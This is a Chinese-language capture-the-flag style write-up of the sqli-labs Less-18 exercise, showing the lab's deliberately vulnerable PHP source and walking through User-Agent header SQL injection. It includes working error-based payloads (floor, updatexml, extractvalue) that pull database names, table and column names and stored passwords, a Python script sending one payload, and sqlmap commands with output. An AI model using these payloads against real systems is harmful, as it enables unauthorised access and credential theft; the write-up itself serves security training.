sqli-lab-less18

sqli-lab-less18

一、靶标地址

Less-18 POST-Header Injection - Uagent field -Error based
#请求头 User-Agent 注入
http://127.0.0.1/sqli/less-18/

二、漏洞探测

输入1 1
得到post数据包
uname=1&passwd=1&submit=Submit
#发现回显Your IP ADDRESS is 127.0.0.1

三、源码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
	
/**
 * Normalises one POST field before it is spliced into the login query.
 *
 * A non-empty value is truncated to 20 characters; backslashes added by
 * magic_quotes are stripped; then a value that is not all digits is escaped
 * with mysql_real_escape_string() and wrapped in single quotes (ctype_digit('')
 * is false, so an empty string comes back as ''), while an all-digit string is
 * returned as an int via intval(). The caller therefore interpolates the result
 * bare, without surrounding quotes, which is what the login SELECT and the
 * username slot of the INSERT further down do.
 *
 * Brace note: the `else` near the end pairs with the ctype_digit() check, not
 * with the empty() check the indentation suggests.
 * mysql_real_escape_string() escapes relative to the connection opened by the
 * included sql-connect.php.
 *
 * @param string $value raw request value
 * @return int|string int for digit-only input, quoted escaped string otherwise
 */
function check_input($value)
	{
	if(!empty($value))
		{
		// truncate to at most 20 characters
		$value = substr($value,0,20);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote (and escape) if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}



	// ---- Lab main body -----------------------------------------------------
	// Reads two request-derived values that never pass through check_input():
	// the User-Agent header and the client IP. Both are later interpolated into
	// an INSERT as single-quoted string literals without escaping, so a quote in
	// the User-Agent breaks the statement and the MySQL error text is echoed
	// back (error-based injection). The fix is to escape or parameterise
	// $uagent and $IP exactly as the form fields are handled.
	$uagent = $_SERVER['HTTP_USER_AGENT'];
    # Client-supplied User-Agent header (browser / OS information); attacker-controlled.
	$IP = $_SERVER['REMOTE_ADDR'];
    # Client IP as seen by the web server.
    # $_SERVER is an array of header, path and script-location entries populated by the web server; not every server provides every entry, some may be omitted and others added.
	echo "<br>";
	echo 'Your IP ADDRESS is: ' .$IP;
	echo "<br>";
	//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

	{
	$uname = check_input($_POST['uname']);# both uname and passwd go through check_input (truncate / escape / quote)
	$passwd = check_input($_POST['passwd']);
	
	/*
	echo 'Your Your User name:'. $uname;
	echo "<br>";
	echo 'Your Password:'. $passwd;
	echo "<br>";
	echo 'Your User Agent String:'. $uagent;
	echo "<br>";
	echo 'Your User Agent String:'. $IP;
	*/

	//logging the connection parameters to a file for analysis.	
	// NOTE: the label says "User Agent" but the value written is $uname; fopen's return is not checked.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Agent:'.$uname."\n");
	
	fclose($fp);
	
	
	
	// Login lookup. $uname and $passwd are already quoted-or-int from check_input, so they are interpolated bare.
	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    # Simplified: select username,password from users where username=$uname and password=$passwd order by id desc limit 0,1;
    # DESC = descending order
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)# only reached after a successful lookup, so this path needs a valid username/password pair
			{
			echo '<font color= "#FFFF00" font size = 3 >';
			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
            # Inserts uagent, ip_address and username into security.uagents. $uagent and $IP are raw (single-quoted, not escaped); $uname already carries its quotes from check_input. This is the injection point.
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color= "#0000ff" font size = 3 >';			
			echo 'Your User Agent is: ' .$uagent;// echoes the raw header back into the HTML without htmlspecialchars()
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());		// prints the error of the last query; $IP is a server-side value and $uname is sanitised, so only the User-Agent can produce one	
			echo "<br><br>";
			echo '<img src="../images/flag.jpg"  />';
			echo "<br>";
			
			}
		else
			{
			echo '<font color= "#0000ff" font size="3">';
			//echo "Try again looser";
			print_r(mysql_error());// prints the error of the login SELECT, if any
			echo "</br>";			
			echo "</br>";
			echo '<img src="../images/slap.jpg"   />';	
			echo "</font>";  
			}

	}

?>

四、黑盒与白盒测试

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

Postdata:
uname=admin&passwd=admin&submit=Submit
UserAgent:
1'
#Your User Agent is: 1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'admin')' at line 1

Postdata:
uname=admin&passwd=admin&submit=Submit
UserAgent:
1')
Your User Agent is: 1')
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', '127.0.0.1', 'admin')' at line 1

Postdata:
uname=admin&passwd=admin&submit=Submit
UserAgent:
1'))
#Your User Agent is: 1'))
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')', '127.0.0.1', 'admin')' at line 1

猜测不出语句,只能知道会出现报错
在实际猜测中最好对' ') '))都进行测试
1、floor()函数报错
#获取数据库 用户 版本号
UserAgent:
1' and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#因为 insert/update 语句无法使用 union select,所以用 and 连接,并把后面的子查询放在括号里

#获取表名
UserAgent:
1' and (select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '

#获取列名
UserAgent:
1' and (select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '

#获取用户名
UserAgent:
1' and (select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '

2、updatexml()函数报错
insert into uagents (`uagent`, `ip_address`, `username`) values ('$uagent', '$IP', $uname);

#获取数据库名
UserAgent:
1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '
#insert into uagents (`uagent`, `ip_address`, `username`) values ('1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '', 'a', 'b');
#后面是and'的原因是需要闭合前后两个引号,保证values后面的参数格式
#第一个参数是'1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and ''
select '1' and '2' and '3';
#1

#获取数据库名的第二种方式仅供参考
#补充一点:这里并不是URL而是HTTP头,所以+并不会被转义为(空格),于是末尾的注释符号要变为#。
1' or updatexml(1,concat('#',(database())),0),' ',' ')#
1' and updatexml(1,concat('#',(database())),0),' ',' ')#
#这里是直接补充了value的两个空参数

#获取表名
UserAgent:
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) and '

#获取列名
UserAgent:
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) and '

#获取列字段
UserAgent:
1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) and '

3、extractvalue()函数报错

#获取当前数据库名
UserAgent:
1' and extractvalue(1,concat(0x7e,(select database()))) and '

#获取表名
UserAgent:
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '

#获取列名
UserAgent:
' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) and '

#获取列字段
UserAgent:
1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) and '
UserAgent:
1' and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) and '

五、脚本撰写

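import requests

# Lab target (sqli-labs Less-18); the host is environment-specific.
url="http://192.168.128.159/sqli/less-18/index.php"
# Request headers as captured from the browser (F12) or Burp. The User-Agent
# carries the error-based payload because the lab interpolates that header
# into its INSERT statement without escaping; the remaining headers only
# mimic an ordinary browser request.
header={
        'User-Agent': "1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '",
        'Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# Form fields. The lab only reaches the vulnerable INSERT after the login
# SELECT finds a row, so these must be a valid pair from the lab's users table.
payload = {
        "uname" : "admin",
        "passwd" : "admin"
}
# Bounded timeout (seconds) so the script fails instead of hanging forever
# when the lab host is unreachable or the query stalls.
response=requests.post(url,headers=header,data=payload,timeout=10)
# The lab echoes the MySQL error text into the page, so the body is printed as-is.
print(response.text)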

六、sqlmap

sqlmap -u "http://192.168.128.159/sqli/Less-18/" --data "uname=admin&passwd=admin&submit=Submit" --user-agent="" --level 4 --batch
#未探测出
#level>=3 才会去检查 User-Agent 头是否存在注入漏洞

sqlmap -r target.txt --level 4 --batch
#未探测出

或者
sqlmap -r target.txt  --batch
#需要把User-Agent的值设置为*
#探测速度最快
Parameter: User-Agent #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 2412 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(2412=2412,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xOtp'='xOtp

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ' AND (SELECT 6241 FROM (SELECT(SLEEP(5)))wmJd) AND 'IJbP'='IJbP

POST /sqli/less-18/ HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: *
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-18/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

uname=admin&passwd=admin&submit=Submit

七、总结

1、需要提前爆破一个合法用户
2、目前掌握的报错函数回显语句包括
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";